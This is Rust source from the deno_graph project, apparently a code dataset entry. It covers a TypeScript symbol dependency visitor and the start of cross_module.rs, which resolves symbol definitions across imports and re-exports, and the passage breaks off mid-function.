fn visit_ts_expr_with_type_args(&mut self, n: &TsExprWithTypeArgs) {
if let Some(type_args) = &n.type_args {
self.visit_ts_type_param_instantiation(type_args);
}
// visit this expr unconditionally because it's in a TsExprWithTypeArgs
self.visit_expr(&n.expr);
}
fn visit_ts_type_param_decl(&mut self, type_params: &TsTypeParamDecl) {
for param in &type_params.params {
self.visit_ts_type_param(param);
}
}
fn visit_ts_type_param(&mut self, param: &TsTypeParam) {
if let Some(constraint) = ¶m.constraint {
self.visit_ts_type(constraint);
}
if let Some(default) = ¶m.default {
self.visit_ts_type(default);
}
}
fn visit_ts_type_param_instantiation(
&mut self,
type_params: &TsTypeParamInstantiation,
) {
for param in &type_params.params {
self.visit_ts_type(param);
}
}
fn visit_ts_param_prop(&mut self, param: &TsParamProp) {
match ¶m.param {
TsParamPropParam::Ident(ident) => {
if let Some(type_ann) = &ident.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
TsParamPropParam::Assign(assign) => match &*assign.left {
Pat::Ident(ident) => {
if let Some(type_ann) = &ident.type_ann {
self.visit_ts_type_ann(type_ann)
} else {
self.visit_type_if_type_assertion(&assign.right);
}
}
_ => {
unreachable!();
}
},
}
}
fn visit_param(&mut self, param: &Param) {
self.visit_pat(¶m.pat);
}
fn visit_pat(&mut self, pat: &Pat) {
match pat {
Pat::Ident(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Array(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Rest(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Object(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Assign(n) => {
self.visit_pat(&n.left);
if !pat_has_type_ann(&n.left) {
let visited_type_assertion =
self.visit_type_if_type_assertion(&n.right);
if !visited_type_assertion && self.mode.visit_exprs() {
self.visit_expr(&n.right);
}
}
}
Pat::Invalid(_) => {
// ignore
}
Pat::Expr(expr) => {
if self.mode.visit_exprs() {
self.visit_expr(expr);
}
}
}
}
fn visit_expr(&mut self, n: &Expr) {
match expr_into_id_and_parts(n) {
Some((id, parts)) => {
if parts.is_empty() {
self.deps.push(SymbolNodeDep::Id(id))
} else {
self.deps.push(SymbolNodeDep::QualifiedId(id, parts))
}
}
_ => {
n.visit_children_with(self);
}
}
}
fn visit_ident(&mut self, n: &Ident) {
let id = n.to_id();
self.deps.push(id.into());
}
fn visit_binding_ident(&mut self, n: &BindingIdent) {
// skip over the ident because it's not a dep
n.type_ann.visit_with(self);
}
fn visit_member_expr(&mut self, n: &MemberExpr) {
match member_expr_into_id_and_parts(n) {
Some((id, parts)) => {
self.deps.push(SymbolNodeDep::QualifiedId(id, parts))
}
_ => {
n.visit_children_with(self);
}
}
}
fn visit_ts_tuple_element(&mut self, n: &TsTupleElement) {
n.ty.visit_with(self);
}
fn visit_ts_import_type(&mut self, n: &TsImportType) {
let parts = match &n.qualifier {
Some(qualifier) => {
let (leftmost_id, mut parts) = ts_entity_name_to_parts(qualifier);
parts.insert(0, leftmost_id.0.to_string());
parts
}
None => Vec::new(),
};
self.deps.push(SymbolNodeDep::ImportType(
n.arg.value.to_string_lossy().to_string(),
parts,
));
n.type_args.visit_with(self);
}
fn visit_ts_qualified_name(&mut self, n: &TsQualifiedName) {
let (id, parts) = ts_qualified_name_parts(n);
self.deps.push(SymbolNodeDep::QualifiedId(id, parts));
}
fn visit_ts_type_ann(&mut self, type_ann: &TsTypeAnn) {
self.visit_ts_type(&type_ann.type_ann)
}
fn visit_ts_type_assertion(&mut self, n: &TsTypeAssertion) {
self.visit_ts_type(&n.type_ann);
}
fn visit_ts_as_expr(&mut self, n: &TsAsExpr) {
self.visit_ts_type(&n.type_ann);
}
}
/// Returns `true` when the pattern carries an explicit type annotation.
///
/// For assignment patterns the left-hand side is inspected recursively;
/// invalid and expression patterns never carry an annotation.
fn pat_has_type_ann(n: &Pat) -> bool {
  match n {
    Pat::Ident(ident) => ident.type_ann.is_some(),
    Pat::Array(array) => array.type_ann.is_some(),
    Pat::Rest(rest) => rest.type_ann.is_some(),
    Pat::Object(object) => object.type_ann.is_some(),
    Pat::Assign(assign) => pat_has_type_ann(&assign.left),
    Pat::Invalid(_) | Pat::Expr(_) => false,
  }
}
/// Attempts to flatten an expression into a root identifier plus the
/// property names accessed off of it.
///
/// Returns `None` for anything that is not an identifier or a member
/// expression that flattens to one.
fn expr_into_id_and_parts(expr: &Expr) -> Option<(Id, Vec<String>)> {
  if let Expr::Ident(ident) = expr {
    Some((ident.to_id(), Vec::new()))
  } else if let Expr::Member(member) = expr {
    member_expr_into_id_and_parts(member)
  } else {
    None
  }
}
/// Flattens a member expression (ex. `a.b["c"]`) into its root identifier
/// and the chain of property names accessed off of it.
///
/// Returns `None` when the root does not flatten to an identifier or when
/// any property in the chain cannot be represented as a static string
/// (ex. a computed property whose key is not a string literal).
fn member_expr_into_id_and_parts(
  member: &MemberExpr,
) -> Option<(Id, Vec<String>)> {
  // converts a single property access into its text form, if statically known
  fn member_prop_to_str(member_prop: &MemberProp) -> Option<String> {
    match member_prop {
      MemberProp::Ident(ident) => Some(ident.sym.to_string()),
      // private names are prefixed with `#` to match their source text
      MemberProp::PrivateName(n) => Some(format!("#{}", n.name)),
      MemberProp::Computed(n) => match &*n.expr {
        Expr::Lit(Lit::Str(str)) => str.value.as_str().map(ToOwned::to_owned),
        _ => None,
      },
    }
  }
  let (id, mut parts) = expr_into_id_and_parts(&member.obj)?;
  parts.push(member_prop_to_str(&member.prop)?);
  Some((id, parts))
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/cross_module.rs | src/symbols/cross_module.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::HashSet;
use std::collections::VecDeque;
use deno_ast::SourceRange;
use indexmap::IndexMap;
use crate::ModuleGraph;
use crate::ModuleSpecifier;
use super::FileDep;
use super::FileDepName;
use super::ModuleInfoRef;
use super::Symbol;
use super::SymbolDecl;
use super::SymbolId;
use super::SymbolNodeDep;
use super::UniqueSymbolId;
use super::analyzer::SymbolDeclKind;
/// Either a fully resolved definition or the point at which resolution
/// gave up.
#[derive(Debug, Clone)]
pub enum DefinitionOrUnresolved<'a> {
  Definition(Definition<'a>),
  Unresolved(DefinitionUnresolved<'a>),
}
impl<'a> DefinitionOrUnresolved<'a> {
  /// The module the entry was found in.
  pub fn module(&self) -> ModuleInfoRef<'a> {
    match self {
      DefinitionOrUnresolved::Definition(def) => def.module,
      DefinitionOrUnresolved::Unresolved(unresolved) => unresolved.module,
    }
  }
  /// The resolved symbol, or `None` for an unresolved entry.
  pub fn symbol(&self) -> Option<&'a Symbol> {
    match self {
      DefinitionOrUnresolved::Definition(def) => Some(def.symbol),
      DefinitionOrUnresolved::Unresolved(_) => None,
    }
  }
}
/// How a definition was reached.
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum DefinitionKind<'a> {
  /// Reached via an `export * from "..."` re-export.
  ExportStar(&'a FileDep),
  /// A direct definition.
  Definition,
}
/// A resolved definition of a symbol along with the declaration it came
/// from.
#[derive(Debug, Clone)]
pub struct Definition<'a> {
  pub kind: DefinitionKind<'a>,
  pub module: ModuleInfoRef<'a>,
  pub symbol: &'a Symbol,
  pub symbol_decl: &'a SymbolDecl,
}
impl Definition<'_> {
  /// Source range of the declaration.
  pub fn range(&self) -> &SourceRange {
    &self.symbol_decl.range
  }
  /// The declaration's range as a byte range within the module's text.
  pub fn byte_range(&self) -> std::ops::Range<usize> {
    self
      .range()
      .as_byte_range(self.module.text_info().range().start)
  }
  /// The source text of the declaration.
  pub fn text(&self) -> &str {
    self.module.text_info().range_text(self.range())
  }
}
/// The reason a definition could not be resolved.
#[derive(Debug, Clone)]
pub enum DefinitionUnresolvedKind {
  /// Could not resolve the swc Id.
  Id(deno_ast::swc::ast::Id),
  /// Could not resolve the specifier relative to this module via deno_graph.
  Specifier(String),
  /// Could not resolve the part on the symbol.
  Part(String),
}
/// The point at which a definition could not be resolved.
#[derive(Debug, Clone)]
pub struct DefinitionUnresolved<'a> {
  /// Module where resolution stopped.
  pub module: ModuleInfoRef<'a>,
  pub kind: DefinitionUnresolvedKind,
  /// Qualified-name parts that were left to resolve at the failure point.
  pub parts: Vec<String>,
}
/// A non-terminal node in a definition path that forwards to further
/// nodes (ex. a re-export or a local re-assignment).
#[derive(Debug, Clone)]
pub struct DefinitionPathLink<'a> {
  pub module: ModuleInfoRef<'a>,
  pub symbol: &'a Symbol,
  pub symbol_decl: &'a SymbolDecl,
  /// Qualified-name parts still being resolved at this link.
  pub parts: Vec<String>,
  /// The next nodes along the path.
  pub next: Vec<DefinitionPathNode<'a>>,
}
/// A resolved node in a definition path: either an intermediate link or
/// a terminal definition.
#[derive(Debug, Clone)]
pub enum DefinitionPathNodeResolved<'a> {
  Link(DefinitionPathLink<'a>),
  Definition(Definition<'a>),
}
impl<'a> DefinitionPathNodeResolved<'a> {
  /// The symbol at this node.
  pub fn symbol(&self) -> Option<&'a Symbol> {
    match self {
      Self::Link(link) => Some(link.symbol),
      Self::Definition(def) => Some(def.symbol),
    }
  }
  /// The module this node was found in.
  pub fn module(&self) -> ModuleInfoRef<'a> {
    match self {
      Self::Link(link) => link.module,
      Self::Definition(def) => def.module,
    }
  }
}
/// A graph path to a definition.
#[derive(Debug, Clone)]
pub enum DefinitionPathNode<'a> {
  Resolved(DefinitionPathNodeResolved<'a>),
  Unresolved(DefinitionUnresolved<'a>),
}
impl<'a> DefinitionPathNode<'a> {
  /// Shorthand for a terminal definition node.
  fn definition(definition: Definition<'a>) -> Self {
    Self::Resolved(DefinitionPathNodeResolved::Definition(definition))
  }
  /// Shorthand for an intermediate link node.
  fn link(link: DefinitionPathLink<'a>) -> Self {
    Self::Resolved(DefinitionPathNodeResolved::Link(link))
  }
  /// The module this node was found in.
  pub fn module(&self) -> ModuleInfoRef<'a> {
    match self {
      Self::Resolved(resolved) => resolved.module(),
      Self::Unresolved(unresolved) => unresolved.module,
    }
  }
  /// Iterates only the fully resolved definitions reachable from this
  /// node, skipping unresolved leaves.
  pub fn into_definitions(self) -> impl Iterator<Item = Definition<'a>> {
    self
      .into_definitions_or_unresolveds()
      .filter_map(|d| match d {
        DefinitionOrUnresolved::Definition(d) => Some(d),
        DefinitionOrUnresolved::Unresolved(_) => None,
      })
  }
  /// Iterates every leaf (definitions and unresolved points) reachable
  /// from this node in depth-first order.
  pub fn into_definitions_or_unresolveds(
    self,
  ) -> impl Iterator<Item = DefinitionOrUnresolved<'a>> {
    // depth-first traversal over the path tree via an explicit deque
    struct IntoIterator<'a> {
      queue: VecDeque<DefinitionPathNode<'a>>,
    }
    impl<'a> Iterator for IntoIterator<'a> {
      type Item = DefinitionOrUnresolved<'a>;
      fn next(&mut self) -> Option<Self::Item> {
        while let Some(path) = self.queue.pop_front() {
          match path {
            DefinitionPathNode::Resolved(DefinitionPathNodeResolved::Link(
              link,
            )) => {
              // push children to the front in reverse to preserve order
              for child_path in link.next.into_iter().rev() {
                self.queue.push_front(child_path);
              }
            }
            DefinitionPathNode::Resolved(
              DefinitionPathNodeResolved::Definition(def),
            ) => {
              return Some(DefinitionOrUnresolved::Definition(def));
            }
            DefinitionPathNode::Unresolved(unresolved) => {
              return Some(DefinitionOrUnresolved::Unresolved(unresolved));
            }
          }
        }
        None
      }
    }
    IntoIterator {
      queue: VecDeque::from([self]),
    }
  }
}
/// Finds the path to a definition.
pub fn find_definition_paths<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
symbol: &'a Symbol,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
find_definition_paths_internal(
module_graph,
module,
symbol,
&mut Default::default(),
specifier_to_module,
)
}
/// Recursive worker for [`find_definition_paths`] that tracks visited
/// symbols to guard against cycles (ex. circular re-exports).
fn find_definition_paths_internal<'a>(
  module_graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  symbol: &'a Symbol,
  visited_symbols: &mut HashSet<UniqueSymbolId>,
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
  debug_assert_eq!(module.module_id(), symbol.module_id());
  // cycle guard: each symbol is expanded at most once
  if !visited_symbols.insert(symbol.unique_id()) {
    return Vec::new();
  }
  let mut paths = Vec::with_capacity(symbol.decls().len());
  for decl in symbol.decls() {
    match &decl.kind {
      // a direct definition terminates the path
      SymbolDeclKind::Definition(_) => {
        paths.push(DefinitionPathNode::definition(Definition {
          module,
          symbol,
          symbol_decl: decl,
          kind: DefinitionKind::Definition,
        }));
      }
      // points at another symbol in the same module via its swc id
      SymbolDeclKind::Target(target_id) => {
        if let Some(symbol) = module
          .esm()
          .unwrap()
          .symbol_id_from_swc(target_id)
          .and_then(|id| module.symbol(id))
        {
          let inner_paths = find_definition_paths_internal(
            module_graph,
            module,
            symbol,
            visited_symbols,
            specifier_to_module,
          );
          if !inner_paths.is_empty() {
            paths.push(DefinitionPathNode::link(DefinitionPathLink {
              module,
              symbol,
              symbol_decl: decl,
              parts: Vec::new(),
              next: inner_paths,
            }));
          }
        }
      }
      // points at a property chain off a local swc id
      SymbolDeclKind::QualifiedTarget(target_id, parts) => {
        let inner_paths = go_to_id_and_parts_definition_paths(
          module_graph,
          module,
          target_id,
          parts,
          specifier_to_module,
        );
        if !inner_paths.is_empty() {
          paths.push(DefinitionPathNode::link(DefinitionPathLink {
            module,
            symbol,
            symbol_decl: decl,
            parts: parts.clone(),
            next: inner_paths,
          }));
        }
      }
      // points into another file (import or re-export)
      SymbolDeclKind::FileRef(file_ref) => match &file_ref.name {
        FileDepName::Star => {
          // `export * from "..."` is treated as a terminal definition
          paths.push(DefinitionPathNode::definition(Definition {
            module,
            symbol,
            kind: DefinitionKind::ExportStar(file_ref),
            symbol_decl: decl,
          }));
        }
        FileDepName::Name(export_name) => {
          let inner_paths = go_to_file_export(
            module_graph,
            module,
            file_ref,
            export_name,
            specifier_to_module,
            visited_symbols,
          );
          if !inner_paths.is_empty() {
            paths.push(DefinitionPathNode::link(DefinitionPathLink {
              module,
              symbol,
              symbol_decl: decl,
              parts: Vec::new(),
              next: inner_paths,
            }));
          }
        }
      },
    }
  }
  paths
}
/// Follows a named import/re-export (`file_ref`) into the dependency
/// module and resolves `export_name` there, falling back to scanning the
/// dependency's `export * from "..."` re-exports.
fn go_to_file_export<'a>(
  module_graph: &'a ModuleGraph,
  referrer_module: ModuleInfoRef<'a>,
  file_ref: &'a FileDep,
  export_name: &'a str,
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
  visited_symbols: &mut HashSet<UniqueSymbolId>,
) -> Vec<DefinitionPathNode<'a>> {
  let maybe_dep_module = module_graph
    .resolve_dependency(
      &file_ref.specifier,
      referrer_module.specifier(),
      /* prefer types */ true,
    )
    .and_then(specifier_to_module);
  let Some(dep_module) = maybe_dep_module else {
    // the specifier didn't resolve to a known module
    return vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
      module: referrer_module,
      kind: DefinitionUnresolvedKind::Specifier(file_ref.specifier.clone()),
      parts: Vec::new(),
    })];
  };
  // first look for a direct export with that name
  let maybe_export_symbol = dep_module
    .module_symbol()
    .exports()
    .get(export_name)
    .and_then(|symbol_id| dep_module.symbol(*symbol_id));
  match maybe_export_symbol {
    Some(export_symbol) => find_definition_paths_internal(
      module_graph,
      dep_module,
      export_symbol,
      visited_symbols,
      specifier_to_module,
    ),
    None => {
      // maybe it's in a re-export
      if let Some(re_export_all_specifiers) =
        dep_module.re_export_all_specifiers()
      {
        for re_export_specifier in re_export_all_specifiers {
          let maybe_specifier = module_graph.resolve_dependency(
            re_export_specifier,
            dep_module.specifier(),
            /* prefer_types */ true,
          );
          let maybe_module = maybe_specifier.and_then(specifier_to_module);
          // fresh visited set per specifier so each chain is fully explored
          let mut visited = HashSet::new();
          if let Some(module) = maybe_module {
            // todo(dsherret): this could be optimized to use an iterator
            let inner = exports_and_re_exports_inner(
              module_graph,
              module,
              specifier_to_module,
              &mut visited,
            );
            for (name, item) in inner.resolved {
              if name == export_name {
                let resolved_rexport = item.as_resolved_export();
                let paths = find_definition_paths_internal(
                  module_graph,
                  resolved_rexport.module,
                  resolved_rexport.symbol(),
                  visited_symbols,
                  specifier_to_module,
                );
                if !paths.is_empty() {
                  return paths;
                }
                break;
              }
            }
          }
        }
      }
      // not found in the module or any of its re-exports
      vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
        module: dep_module,
        kind: DefinitionUnresolvedKind::Part(export_name.to_string()),
        parts: Vec::new(),
      })]
    }
  }
}
/// A resolved [`SymbolNodeDep`].
#[derive(Debug)]
pub enum ResolvedSymbolDepEntry<'a> {
  /// The path to the definition of the symbol dep.
  Path(DefinitionPathNode<'a>),
  /// If the symbol dep was an import type with no property access.
  ///
  /// Ex. `type MyType = typeof import("./my_module.ts");`
  ImportType(ModuleInfoRef<'a>),
}
/// Resolves a [`SymbolNodeDep`] of `module` to the paths of its
/// definitions.
pub fn resolve_symbol_dep<'a>(
  module_graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  dep: &SymbolNodeDep,
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<ResolvedSymbolDepEntry<'a>> {
  match dep {
    // a bare identifier
    SymbolNodeDep::Id(id) => {
      if let Some(dep_symbol) = module.esm().and_then(|m| m.symbol_from_swc(id))
      {
        find_definition_paths(
          module_graph,
          module,
          dep_symbol,
          specifier_to_module,
        )
        .into_iter()
        .map(ResolvedSymbolDepEntry::Path)
        .collect()
      } else {
        vec![ResolvedSymbolDepEntry::Path(
          DefinitionPathNode::Unresolved(DefinitionUnresolved {
            module,
            kind: DefinitionUnresolvedKind::Id(id.clone()),
            parts: Vec::new(),
          }),
        )]
      }
    }
    // an identifier with property accesses (ex. `a.b.c`)
    SymbolNodeDep::QualifiedId(id, parts) => {
      go_to_id_and_parts_definition_paths(
        module_graph,
        module,
        id,
        parts,
        specifier_to_module,
      )
      .into_iter()
      .map(ResolvedSymbolDepEntry::Path)
      .collect()
    }
    // an `import("...")` type, possibly with property accesses
    SymbolNodeDep::ImportType(import_specifier, parts) => {
      let maybe_dep_specifier = module_graph.resolve_dependency(
        import_specifier,
        module.specifier(),
        /* prefer types */ true,
      );
      let maybe_module = maybe_dep_specifier.and_then(specifier_to_module);
      let Some(module) = maybe_module else {
        // `module` here still refers to the referrer module
        return vec![ResolvedSymbolDepEntry::Path(
          DefinitionPathNode::Unresolved(DefinitionUnresolved {
            module,
            kind: DefinitionUnresolvedKind::Specifier(import_specifier.clone()),
            parts: parts.clone(),
          }),
        )];
      };
      if parts.is_empty() {
        // an ImportType includes default exports
        vec![ResolvedSymbolDepEntry::ImportType(module)]
      } else {
        resolve_qualified_export_name(
          module_graph,
          module,
          parts,
          specifier_to_module,
        )
        .into_iter()
        .map(ResolvedSymbolDepEntry::Path)
        .collect()
      }
    }
  }
}
fn go_to_id_and_parts_definition_paths<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
target_id: &deno_ast::swc::ast::Id,
parts: &[String],
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
if let Some(symbol_id) =
module.esm().and_then(|m| m.symbol_id_from_swc(target_id))
{
resolve_qualified_name(
module_graph,
module,
module.symbol(symbol_id).unwrap(),
parts,
specifier_to_module,
)
} else {
vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
module,
kind: DefinitionUnresolvedKind::Id(target_id.clone()),
parts: parts.to_vec(),
})]
}
}
/// Resolves a qualified name (ex. `exportName.prop`) against a module's
/// exports, starting with a fresh set of visited symbols.
///
/// `parts` must be non-empty; the first part names the export to look up.
fn resolve_qualified_export_name<'a>(
  graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  parts: &[String],
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
  debug_assert!(!parts.is_empty());
  let mut visited_symbols = HashSet::new();
  resolve_qualified_export_name_internal(
    graph,
    module,
    parts,
    &mut visited_symbols,
    specifier_to_module,
  )
}
/// Worker for [`resolve_qualified_export_name`] that shares the visited
/// symbol set with its callers.
fn resolve_qualified_export_name_internal<'a>(
  graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  parts: &[String],
  visited_symbols: &mut HashSet<UniqueSymbolId>,
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
  debug_assert!(!parts.is_empty());
  let exports = exports_and_re_exports(graph, module, specifier_to_module);
  // the first part names the export; remaining parts are resolved
  // against that export's symbol
  let export_name = &parts[0];
  if let Some(resolved) = exports.resolved.get(export_name) {
    let resolved = resolved.as_resolved_export();
    resolve_qualified_name_internal(
      graph,
      resolved.module,
      resolved.symbol(),
      &parts[1..],
      visited_symbols,
      specifier_to_module,
    )
  } else {
    vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
      module,
      kind: DefinitionUnresolvedKind::Part(export_name.to_string()),
      parts: parts.to_vec(),
    })]
  }
}
/// Resolves the remaining `parts` of a qualified name against `symbol`'s
/// definitions, starting with a fresh set of visited symbols.
pub fn resolve_qualified_name<'a>(
  graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  symbol: &'a Symbol,
  parts: &[String],
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
  let mut visited_symbols = HashSet::new();
  resolve_qualified_name_internal(
    graph,
    module,
    symbol,
    parts,
    &mut visited_symbols,
    specifier_to_module,
  )
}
/// Worker for [`resolve_qualified_name`]: finds the base symbol's
/// definition paths, then resolves any remaining `parts` against the
/// definitions those paths reach.
fn resolve_qualified_name_internal<'a>(
  graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  symbol: &'a Symbol,
  parts: &[String],
  visited_symbols: &mut HashSet<UniqueSymbolId>,
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
  // fans `parts` resolution out over every candidate path
  fn resolve_paths_with_parts<'a>(
    paths: Vec<DefinitionPathNode<'a>>,
    parts: &[String],
    graph: &'a ModuleGraph,
    visited_symbols: &mut HashSet<UniqueSymbolId>,
    specifier_to_module: &impl Fn(&url::Url) -> Option<ModuleInfoRef<'a>>,
  ) -> Vec<DefinitionPathNode<'a>> {
    debug_assert!(!parts.is_empty());
    paths
      .into_iter()
      .flat_map(|path| {
        resolve_path_with_parts(
          path,
          parts,
          graph,
          visited_symbols,
          specifier_to_module,
        )
      })
      .collect()
  }
  // resolves the remaining parts against a single path node, returning
  // `None` when nothing further resolves along it
  fn resolve_path_with_parts<'a>(
    path: DefinitionPathNode<'a>,
    parts: &[String],
    graph: &'a ModuleGraph,
    visited_symbols: &mut HashSet<UniqueSymbolId>,
    specifier_to_module: &impl Fn(&url::Url) -> Option<ModuleInfoRef<'a>>,
  ) -> Option<DefinitionPathNode<'a>> {
    match path {
      DefinitionPathNode::Resolved(DefinitionPathNodeResolved::Link(link)) => {
        // push resolution down into the link's children
        let next = resolve_paths_with_parts(
          link.next,
          parts,
          graph,
          visited_symbols,
          specifier_to_module,
        );
        if next.is_empty() {
          None
        } else {
          Some(DefinitionPathNode::link(DefinitionPathLink {
            module: link.module,
            symbol: link.symbol,
            symbol_decl: link.symbol_decl,
            parts: parts.to_vec(),
            next,
          }))
        }
      }
      DefinitionPathNode::Resolved(DefinitionPathNodeResolved::Definition(
        definition,
      )) => {
        let next_part = &parts[0];
        let mut next = Vec::new();
        match definition.kind {
          DefinitionKind::Definition => {
            if let Some(export_symbol_id) = definition.symbol.export(next_part)
            {
              // consume one part via the symbol's export
              next.extend(resolve_qualified_name_internal(
                graph,
                definition.module,
                definition.module.symbol(export_symbol_id).unwrap(),
                &parts[1..],
                visited_symbols,
                specifier_to_module,
              ));
            } else if next_part == "prototype"
              && definition.symbol_decl.is_class()
            {
              // for now, just resolve to this definition
              debug_assert!(next.is_empty());
              return Some(DefinitionPathNode::definition(definition.clone()));
            } else {
              next.push(DefinitionPathNode::Unresolved(DefinitionUnresolved {
                module: definition.module,
                kind: DefinitionUnresolvedKind::Part(next_part.to_string()),
                parts: parts.to_vec(),
              }))
            }
          }
          DefinitionKind::ExportStar(file_dep) => {
            // hop into the re-exported module and resolve there
            let maybe_dep_specifier = graph.resolve_dependency(
              &file_dep.specifier,
              definition.module.specifier(),
              /* prefer types */ true,
            );
            let specifier_module =
              maybe_dep_specifier.and_then(specifier_to_module);
            if let Some(module) = specifier_module {
              next.extend(resolve_qualified_export_name_internal(
                graph,
                module,
                parts,
                visited_symbols,
                specifier_to_module,
              ));
            } else {
              next.push(DefinitionPathNode::Unresolved(DefinitionUnresolved {
                module: definition.module,
                kind: DefinitionUnresolvedKind::Specifier(
                  file_dep.specifier.to_string(),
                ),
                parts: parts.to_vec(),
              }))
            }
          }
        }
        if next.is_empty() {
          None
        } else {
          // convert the definition into a path because the qualified name has yet to be resolved
          Some(DefinitionPathNode::link(DefinitionPathLink {
            module: definition.module,
            symbol: definition.symbol,
            symbol_decl: definition.symbol_decl,
            parts: parts.to_vec(),
            next,
          }))
        }
      }
      // unresolved nodes pass through unchanged
      DefinitionPathNode::Unresolved(unresolved) => {
        Some(DefinitionPathNode::Unresolved(unresolved))
      }
    }
  }
  let paths = find_definition_paths_internal(
    graph,
    module,
    symbol,
    visited_symbols,
    specifier_to_module,
  );
  if !parts.is_empty() {
    resolve_paths_with_parts(
      paths,
      parts,
      graph,
      visited_symbols,
      specifier_to_module,
    )
  } else {
    paths
  }
}
/// A module's resolved exports along with any `export *` specifiers that
/// could not be resolved.
#[derive(Debug, Default, Clone)]
pub struct ModuleExports<'a> {
  /// Export name -> where it resolves to.
  pub resolved: IndexMap<String, ResolvedExportOrReExportAllPath<'a>>,
  /// `export *` specifiers whose module could not be resolved.
  pub unresolved_specifiers: Vec<UnresolvedSpecifier<'a>>,
}
/// A resolved export. This lands at the first symbol it finds, which is not
/// necessarily the declaration symbol. For example, this might be the symbol
/// for an identifier in an export declaration (ex. `export { foo }`).
#[derive(Debug, Clone)]
pub struct ResolvedExport<'a> {
  /// Module the export's symbol lives in.
  pub module: ModuleInfoRef<'a>,
  /// Id of the export's symbol within `module`.
  pub symbol_id: SymbolId,
}
impl<'a> ResolvedExport<'a> {
  /// Looks up the export's symbol in its module.
  pub fn symbol(&self) -> &'a Symbol {
    self.module.symbol(self.symbol_id).unwrap()
  }
}
/// One hop in a chain of `export * from "..."` re-exports.
#[derive(Debug, Clone)]
pub struct ResolvedReExportAllPath<'a> {
  /// Module that contains this re-export.
  pub referrer_module: ModuleInfoRef<'a>,
  /// Specifier from the referrer that led to the resolved module.
  pub specifier: &'a str,
  /// Holds the next resolved export or re-export.
  pub next: Box<ResolvedExportOrReExportAllPath<'a>>,
}
impl ResolvedReExportAllPath<'_> {
  /// The module that this hop's specifier resolved to (the next node's
  /// module).
  pub fn resolved_module(&self) -> ModuleInfoRef<'_> {
    match &*self.next {
      ResolvedExportOrReExportAllPath::Export(e) => e.module,
      ResolvedExportOrReExportAllPath::ReExportAllPath(e) => e.referrer_module,
    }
  }
}
/// A resolved export, or a chain of `export *` hops ending in one.
#[derive(Debug, Clone)]
pub enum ResolvedExportOrReExportAllPath<'a> {
  Export(ResolvedExport<'a>),
  ReExportAllPath(ResolvedReExportAllPath<'a>),
}
impl<'a> ResolvedExportOrReExportAllPath<'a> {
  /// Walks to the terminal resolved export at the end of the chain.
  pub fn as_resolved_export(&self) -> &ResolvedExport<'a> {
    match self {
      ResolvedExportOrReExportAllPath::Export(export) => export,
      ResolvedExportOrReExportAllPath::ReExportAllPath(re_export) => {
        re_export.next.as_resolved_export()
      }
    }
  }
  /// Iterates every node along the chain, including the terminal export.
  pub fn iter(
    &self,
  ) -> impl Iterator<Item = &ResolvedExportOrReExportAllPath<'a>> {
    std::iter::successors(Some(self), |last| match last {
      ResolvedExportOrReExportAllPath::Export(_) => None,
      ResolvedExportOrReExportAllPath::ReExportAllPath(re_export) => {
        Some(&re_export.next)
      }
    })
  }
}
/// An `export *` specifier that could not be resolved to a module.
#[derive(Debug, Clone)]
pub struct UnresolvedSpecifier<'a> {
  /// Module containing the unresolved specifier.
  pub referrer: ModuleInfoRef<'a>,
  pub specifier: &'a str,
}
pub fn exports_and_re_exports<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> ModuleExports<'a> {
exports_and_re_exports_inner(
module_graph,
module,
specifier_to_module,
&mut Default::default(),
)
}
/// Worker for [`exports_and_re_exports`] that tracks visited modules to
/// guard against `export *` cycles.
fn exports_and_re_exports_inner<'a>(
  module_graph: &'a ModuleGraph,
  module: ModuleInfoRef<'a>,
  specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
  visited: &mut HashSet<&'a ModuleSpecifier>,
) -> ModuleExports<'a> {
